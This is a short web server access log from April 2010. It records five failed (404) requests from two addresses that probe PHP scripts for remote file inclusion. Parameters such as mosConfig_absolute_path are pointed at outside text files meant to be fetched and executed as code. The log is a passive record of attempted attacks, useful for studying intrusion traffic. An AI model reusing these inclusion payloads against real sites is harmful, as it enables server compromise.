217.70.32.2 - - [23/Apr/2010:02:59:56 -0500] "GET /logs/access_log.1212105600%20%20//content/multithumb/multithumb.php?mosConfig_absolute_path=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:03:00:16 -0500] "GET /logs/access_log.1220054400%20%20/phphtml.php?htmlclass_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
217.70.32.2 - - [23/Apr/2010:03:00:24 -0500] "GET /logs//content/multithumb/multithumb.php?mosConfig_absolute_path=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
217.70.32.2 - - [23/Apr/2010:03:00:24 -0500] "GET //content/multithumb/multithumb.php?mosConfig_absolute_path=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
217.70.32.2 - - [23/Apr/2010:03:00:24 -0500] "GET /logs/access_log.1271030400//content/multithumb/multithumb.php?mosConfig_absolute_path=http://hdmi.interfree.it/FxID1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
